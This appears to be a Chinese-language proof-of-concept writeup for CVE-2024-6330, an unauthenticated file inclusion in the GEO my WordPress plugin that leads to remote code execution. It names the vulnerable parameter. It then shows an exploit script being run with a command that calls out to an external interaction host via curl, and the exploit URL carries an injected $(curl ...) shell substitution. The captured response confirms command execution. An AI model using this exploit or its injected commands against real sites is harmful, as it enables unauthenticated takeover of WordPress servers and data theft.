
GEO my WordPress < 4.5.0.2 - 未认证LFI导致RCE/PHAR反序列化
GEO my WordPress <= 4.5.0.1 - 未经认证的本地文件包含
WordPress 的 GEO my WP 插件在所有版本(包括 4.5.0.1)中存在本地文件包含漏洞,漏洞通过 'form[info_window_template][content_path]' 参数触发。这使得未经认证的攻击者能够在服务器上包含并执行任意文件,从而执行这些文件中的任何 PHP 代码。此漏洞可用于绕过访问控制、获取敏感数据,或者在可以上传并包含图片及其他“安全”文件类型的情况下实现代码执行。
python3 CVE-2024-6330.py --url https://wp-dev.ddev.site --proxy http://127.0.0.1:8080 --execute="curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site"
[*] 开始安全测试...
[*] 初次访问 https://wp-dev.ddev.site: 200
[+] 测试 object_id: 1
[+] URL: https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=gmw_info_window_init&0=echo%20Command%20Output:%20$(curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site)
[+] 状态码: 200
[+] 响应内容:
Command Output: <html><body>ivv900fnzbln0dem43z7zmzjjgigz</body></html>